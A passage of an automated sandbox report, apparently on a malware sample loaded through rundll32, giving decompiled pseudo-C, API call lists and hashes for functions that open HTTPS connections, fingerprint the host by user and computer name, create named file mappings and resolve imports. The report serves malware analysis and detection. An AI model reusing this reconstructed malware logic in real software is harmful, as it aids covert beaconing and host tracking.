							HeapFree( *0x4a4d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x04a47c3d
                                0x04a47c4f
                                0x04a47c52
                                0x04a47c5e
                                0x04a47c64
                                0x04a47c69
                                0x04a47dd0
                                0x04a47c6f
                                0x04a47c6f
                                0x04a47c71
                                0x04a47c76
                                0x04a47c77
                                0x04a47c7d
                                0x04a47c80
                                0x04a47c83
                                0x04a47c91
                                0x04a47c9c
                                0x04a47c9f
                                0x04a47ca1
                                0x04a47cae
                                0x04a47cb8
                                0x04a47cba
                                0x04a47cbf
                                0x04a47cc4
                                0x04a47ccf
                                0x04a47ccf
                                0x04a47cc6
                                0x04a47cc6
                                0x04a47ccd
                                0x00000000
                                0x00000000
                                0x04a47ccd
                                0x04a47cd9
                                0x00000000
                                0x04a47cdc
                                0x04a47ce0
                                0x04a47ceb
                                0x04a47ceb
                                0x04a47cf2
                                0x04a47cfb
                                0x04a47d02
                                0x04a47d0b
                                0x04a47d0e
                                0x04a47d11
                                0x04a47d16
                                0x04a47d1b
                                0x00000000
                                0x00000000
                                0x04a47d1d
                                0x04a47d20
                                0x04a47d23
                                0x04a47d26
                                0x00000000
                                0x04a47d28
                                0x04a47d37
                                0x04a47d37
                                0x00000000
                                0x04a47d65
                                0x04a47d65
                                0x04a47d6a
                                0x04a47d89
                                0x04a47d8b
                                0x04a47d90
                                0x04a47d91
                                0x00000000
                                0x04a47d6c
                                0x04a47d6c
                                0x04a47d72
                                0x00000000
                                0x04a47d74
                                0x04a47d74
                                0x04a47d79
                                0x04a47d7b
                                0x04a47d80
                                0x04a47d81
                                0x04a47d97
                                0x04a47d97
                                0x04a47d9f
                                0x04a47daa
                                0x04a47dad
                                0x04a47db8
                                0x04a47dba
                                0x04a47dbd
                                0x04a47dbf
                                0x00000000
                                0x04a47dc5
                                0x00000000
                                0x04a47dc5
                                0x04a47dbf
                                0x04a47d72
                                0x00000000
                                0x04a47d6a
                                0x04a47d3a
                                0x04a47d3c
                                0x04a47d3f
                                0x04a47d40
                                0x04a47d40
                                0x04a47d44
                                0x04a47d4e
                                0x04a47d4e
                                0x04a47d54
                                0x04a47d57
                                0x04a47d57
                                0x04a47d5d
                                0x04a47d5d
                                0x04a47dda
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 04A47C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04A47C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04A47C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04A47C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A47CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A47D4E
                                • CloseHandle.KERNEL32(?), ref: 04A47D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04A47D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04A4312C,?), ref: 04A47DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A47DB8
                                  • Part of subcall function 04A45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E59368,00000000,?,74E5F710,00000000,74E5F730), ref: 04A45368
                                  • Part of subcall function 04A45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E593A0,?,00000000,30314549,00000014,004F0053,04E5935C), ref: 04A45405
                                  • Part of subcall function 04A45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A47CCB), ref: 04A45417
                                • GetLastError.KERNEL32 ref: 04A47DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: ae850c4eb15c04e82449a428d293c8cfa97759a70caa229a7e94f813c2098124
                                • Instruction ID: aa3ce20859de765350699ed5e4b8962879864fe4396c435a6a340408af1029c0
                                • Opcode Fuzzy Hash: ae850c4eb15c04e82449a428d293c8cfa97759a70caa229a7e94f813c2098124
                                • Instruction Fuzzy Hash: 41518E79901228AFEB20DF94DD449EEBFB8EFC9324F204616F415A6180D735AA41CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4A85C, Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E04A4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04A41525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E04A48B22(_t56);
					} else {
						E04A48B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04A4A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04A429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x4a4d2a8; // 0x40a5a8
						_t15 = _t59 + 0x4a4e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                0x04a4a85c
                                0x04a4a85c
                                0x04a4a867
                                0x04a4a86e
                                0x04a4a876
                                0x04a4a880
                                0x04a4a886
                                0x04a4a899
                                0x04a4a8a9
                                0x04a4a89b
                                0x04a4a89e
                                0x04a4a8a3
                                0x04a4a8a3
                                0x04a4a899
                                0x04a4a8b9
                                0x04a4a8bf
                                0x04a4a8c4
                                0x04a4a9b0
                                0x00000000
                                0x04a4a8df
                                0x04a4a8e2
                                0x04a4a8f8
                                0x04a4a8fe
                                0x04a4a903
                                0x04a4a92b
                                0x04a4a93e
                                0x04a4a948
                                0x04a4a94b
                                0x04a4a951
                                0x04a4a956
                                0x00000000
                                0x00000000
                                0x04a4a95a
                                0x04a4a966
                                0x04a4a977
                                0x04a4a979
                                0x04a4a98a
                                0x04a4a98a
                                0x04a4a99a
                                0x00000000
                                0x04a4a9ac
                                0x00000000
                                0x04a4a9ac
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a4a903

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04A4A86E
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04A4A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04A4A8B9
                                • InternetSetStatusCallback.WININET(00000000,04A4A7F1), ref: 04A4A8D0
                                • ResetEvent.KERNEL32(?), ref: 04A4A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 04A4A8F8
                                • GetLastError.KERNEL32 ref: 04A4A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 04A4A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04A4A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04A4A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04A4A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04A4A9A6
                                • GetLastError.KERNEL32 ref: 04A4A9B0
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 232dfd5686f9a147e723d44bb98b61370365934568d9c9456b29e46f7c51fd32
                                • Instruction ID: 447d67ae59106a4eef5254117fd14673ae5eac8b5c483ab028c72623068be1e1
                                • Opcode Fuzzy Hash: 232dfd5686f9a147e723d44bb98b61370365934568d9c9456b29e46f7c51fd32
                                • Instruction Fuzzy Hash: 7F418D76540204BFEB319FA5DC88E9F7ABDEBD9700F104928F542D1191E775A945CA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 97 4a4ac95-4a4acfa 98 4a4acfc-4a4ad16 RaiseException 97->98 99 4a4ad1b-4a4ad45 97->99 100 4a4aecb-4a4aecf 98->100 101 4a4ad47 99->101 102 4a4ad4a-4a4ad56 99->102 101->102 103 4a4ad58-4a4ad63 102->103 104 4a4ad69-4a4ad6b 102->104 103->104 112 4a4aeae-4a4aeb5 103->112 105 4a4ad71-4a4ad78 104->105 106 4a4ae13-4a4ae1d 104->106 110 4a4ad88-4a4ad95 LoadLibraryA 105->110 111 4a4ad7a-4a4ad86 105->111 108 4a4ae1f-4a4ae27 106->108 109 4a4ae29-4a4ae2b 106->109 108->109 113 4a4ae2d-4a4ae30 109->113 114 4a4aea9-4a4aeac 109->114 115 4a4ad97-4a4ada7 GetLastError 110->115 116 4a4add8-4a4ade4 InterlockedExchange 110->116 111->110 111->116 122 4a4aeb7-4a4aec4 112->122 123 4a4aec9 112->123 125 4a4ae32-4a4ae35 113->125 126 4a4ae5e-4a4ae6c GetProcAddress 113->126 114->112 117 4a4adb7-4a4add3 RaiseException 115->117 118 4a4ada9-4a4adb5 115->118 119 4a4ade6-4a4adea 116->119 120 4a4ae0c-4a4ae0d FreeLibrary 116->120 117->100 118->116 118->117 119->106 129 4a4adec-4a4adf8 LocalAlloc 119->129 120->106 122->123 123->100 125->126 127 4a4ae37-4a4ae42 125->127 126->114 128 4a4ae6e-4a4ae7e GetLastError 126->128 127->126 130 4a4ae44-4a4ae4a 127->130 132 4a4ae80-4a4ae88 128->132 133 4a4ae8a-4a4ae8c 128->133 129->106 134 4a4adfa-4a4ae0a 129->134 130->126 135 4a4ae4c-4a4ae4f 130->135 132->133 133->114 136 4a4ae8e-4a4aea6 RaiseException 133->136 134->106 135->126 137 4a4ae51-4a4ae5c 135->137 136->114 137->114 137->126
                                C-Code - Quality: 51%
                                			E04A4AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4a40000;
				_t115 = _t139[3] + 0x4a40000;
				_t131 = _t139[4] + 0x4a40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4a40000;
				_v16 = _t139[5] + 0x4a40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4a40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4a4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4a4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4a4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4a4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4a4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4a4d198; // 0x0
										 *_t102 = _t125;
										 *0x4a4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4a4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                0x04a4aca4
                                0x04a4acba
                                0x04a4acc0
                                0x04a4acc2
                                0x04a4acc7
                                0x04a4accd
                                0x04a4acd2
                                0x04a4acd5
                                0x04a4ace3
                                0x04a4acea
                                0x04a4aced
                                0x04a4acf0
                                0x04a4acf1
                                0x04a4acf4
                                0x04a4acf7
                                0x04a4acfa
                                0x04a4acff
                                0x04a4ad0e
                                0x00000000
                                0x04a4ad14
                                0x04a4ad1e
                                0x04a4ad28
                                0x04a4ad2d
                                0x04a4ad2f
                                0x04a4ad39
                                0x04a4ad3c
                                0x04a4ad3f
                                0x04a4ad45
                                0x04a4ad47
                                0x04a4ad47
                                0x04a4ad4a
                                0x04a4ad4d
                                0x04a4ad52
                                0x04a4ad56
                                0x04a4ad69
                                0x04a4ad6b
                                0x04a4ae13
                                0x04a4ae13
                                0x04a4ae1a
                                0x04a4ae1d
                                0x04a4ae27
                                0x04a4ae27
                                0x04a4ae2b
                                0x04a4aea9
                                0x04a4aeac
                                0x04a4aeae
                                0x04a4aeae
                                0x04a4aeb5
                                0x04a4aeb7
                                0x04a4aec1
                                0x04a4aec4
                                0x04a4aec7
                                0x04a4aec7
                                0x00000000
                                0x04a4ae2d
                                0x04a4ae30
                                0x04a4ae5e
                                0x04a4ae68
                                0x04a4ae6c
                                0x04a4ae74
                                0x04a4ae77
                                0x04a4ae7e
                                0x04a4ae88
                                0x04a4ae88
                                0x04a4ae8c
                                0x04a4ae91
                                0x04a4aea0
                                0x04a4aea6
                                0x04a4aea6
                                0x04a4ae8c
                                0x00000000
                                0x04a4ae37
                                0x04a4ae3a
                                0x04a4ae42
                                0x04a4ae57
                                0x04a4ae5c
                                0x00000000
                                0x00000000
                                0x04a4ae5c
                                0x00000000
                                0x04a4ae42
                                0x04a4ae30
                                0x04a4ae2b
                                0x04a4ad71
                                0x04a4ad78
                                0x04a4ad88
                                0x04a4ad8b
                                0x04a4ad91
                                0x04a4ad95
                                0x04a4add8
                                0x04a4ade4
                                0x04a4ae0d
                                0x04a4ade6
                                0x04a4adea
                                0x04a4adf0
                                0x04a4adf8
                                0x04a4adfa
                                0x04a4adfd
                                0x04a4ae03
                                0x04a4ae05
                                0x04a4ae05
                                0x04a4adf8
                                0x04a4adea
                                0x00000000
                                0x04a4ade4
                                0x04a4ad9d
                                0x04a4ada0
                                0x04a4ada7
                                0x04a4adb7
                                0x04a4adba
                                0x04a4adca
                                0x00000000
                                0x04a4add0
                                0x04a4adb1
                                0x04a4adb5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a4adb5
                                0x04a4ad82
                                0x04a4ad86
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a4ad86
                                0x04a4ad5f
                                0x04a4ad63
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04A4AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 04A4AD8B
                                • GetLastError.KERNEL32 ref: 04A4AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04A4ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: d55d034ac82acac21e7aff19cdbbf8b1079f4b903b75cd5b5500ca5924357061
                                • Instruction ID: 0f50bb4536a0ebf1d23d874930be735a6d39010146132036db1d2ef63aa8d2c6
                                • Opcode Fuzzy Hash: d55d034ac82acac21e7aff19cdbbf8b1079f4b903b75cd5b5500ca5924357061
                                • Instruction Fuzzy Hash: DD814B75A41205AFDB20CF98D881BAEB7F5EFD8310F118029E919E7340E7B5EA05CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A47A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 139 4a47a2e-4a47a42 140 4a47a44-4a47a49 139->140 141 4a47a4c-4a47a5e call 4a44f97 139->141 140->141 144 4a47a60-4a47a70 GetUserNameW 141->144 145 4a47ab2-4a47abf 141->145 146 4a47ac1-4a47ad8 GetComputerNameW 144->146 147 4a47a72-4a47a82 RtlAllocateHeap 144->147 145->146 148 4a47b16-4a47b3a 146->148 149 4a47ada-4a47aeb RtlAllocateHeap 146->149 147->146 150 4a47a84-4a47a91 GetUserNameW 147->150 149->148 151 4a47aed-4a47af6 GetComputerNameW 149->151 152 4a47aa1-4a47ab0 150->152 153 4a47a93-4a47a9f call 4a42c0d 150->153 154 4a47b07-4a47b0a 151->154 155 4a47af8-4a47b04 call 4a42c0d 151->155 152->146 153->152 154->148 155->154
                                C-Code - Quality: 96%
                                			E04A47A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4a4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04A44F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4a4d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4a4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04A42C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x4a4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4a4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04A42C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x4a4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                0x04a47a2e
                                0x04a47a36
                                0x04a47a3a
                                0x04a47a3d
                                0x04a47a42
                                0x04a47a44
                                0x04a47a49
                                0x04a47a49
                                0x04a47a4f
                                0x04a47a51
                                0x04a47a5e
                                0x04a47abf
                                0x04a47a60
                                0x04a47a65
                                0x04a47a6b
                                0x04a47a70
                                0x04a47a7e
                                0x04a47a82
                                0x04a47a91
                                0x04a47a98
                                0x04a47a9f
                                0x04a47a9f
                                0x04a47aaa
                                0x04a47aaa
                                0x04a47a82
                                0x04a47a70
                                0x04a47ac1
                                0x04a47ac7
                                0x04a47ad1
                                0x04a47ad3
                                0x04a47ad8
                                0x04a47ae7
                                0x04a47aeb
                                0x04a47af6
                                0x04a47afd
                                0x04a47b04
                                0x04a47b04
                                0x04a47b10
                                0x04a47b10
                                0x04a47aeb
                                0x04a47b1b
                                0x04a47b1d
                                0x04a47b20
                                0x04a47b22
                                0x04a47b25
                                0x04a47b28
                                0x04a47b32
                                0x04a47b36
                                0x04a47b3a

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04A47A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A47A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04A47A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04A430EE), ref: 04A47AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A47AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A47AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A47AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04A430EE), ref: 04A47B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: 9d7dd2e5e97e2d903c4521ed6a76fe595aff0af0ee48d79e921ed436663e034b
                                • Instruction ID: b1e389200c798be9d4d1994a1a7284745b05822c9d5726bd06f9af58cb673a08
                                • Opcode Fuzzy Hash: 9d7dd2e5e97e2d903c4521ed6a76fe595aff0af0ee48d79e921ed436663e034b
                                • Instruction Fuzzy Hash: C831087AA00205EFEB10DFA9DD80A6EB7F9EFD8314B614469E505D7250EB35EE029B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48E0D, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04A48E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04A4AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4a4d2a8; // 0x40a5a8
				_t5 = _t13 + 0x4a4e87e; // 0x4e58e26
				_t6 = _t13 + 0x4a4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04A4AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4a4d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x04a48e0d
                                0x04a48e15
                                0x04a48e19
                                0x04a48e1f
                                0x04a48e24
                                0x04a48e29
                                0x04a48e2c
                                0x04a48e2f
                                0x04a48e34
                                0x04a48e35
                                0x04a48e38
                                0x04a48e3d
                                0x04a48e44
                                0x04a48e4e
                                0x04a48e50
                                0x04a48e51
                                0x04a48e54
                                0x04a48e70
                                0x04a48e76
                                0x04a48e7a
                                0x04a48ec8
                                0x04a48e7c
                                0x04a48e89
                                0x04a48e99
                                0x04a48ea1
                                0x04a48eb3
                                0x04a48eb7
                                0x00000000
                                0x00000000
                                0x04a48ea3
                                0x04a48ea6
                                0x04a48eab
                                0x04a48ead
                                0x04a48ead
                                0x04a48e8b
                                0x04a48e8d
                                0x04a48eb9
                                0x04a48eba
                                0x04a48eba
                                0x04a48e89
                                0x04a48ecf

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53,?,?), ref: 04A48E19
